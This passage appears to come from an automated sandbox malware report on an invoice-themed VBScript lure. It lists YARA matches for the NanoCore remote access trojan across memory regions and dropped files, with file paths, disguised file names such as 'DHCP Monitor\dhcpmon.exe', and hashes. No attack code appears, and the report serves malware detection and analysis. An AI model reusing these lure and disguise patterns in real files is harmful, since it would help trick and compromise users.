            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_0234131A NtQuerySystemInformation,4_2_0234131A
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023412DF NtQuerySystemInformation,4_2_023412DF
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_0004524A4_2_0004524A
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E2FA84_2_022E2FA8
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E23A04_2_022E23A0
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E87884_2_022E8788
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E38504_2_022E3850
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022EB56A4_2_022EB56A
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E969B4_2_022E969B
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E93884_2_022E9388
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E306F4_2_022E306F
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E944F4_2_022E944F
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_00C4524A7_2_00C4524A
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_054338507_2_05433850
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_054323A07_2_054323A0
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_05432FA87_2_05432FA8
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_0543306F7_2_0543306F
            Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Invoice No F1019855_PDF.vbsInitial sample: Strings found which are bigger than 50
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
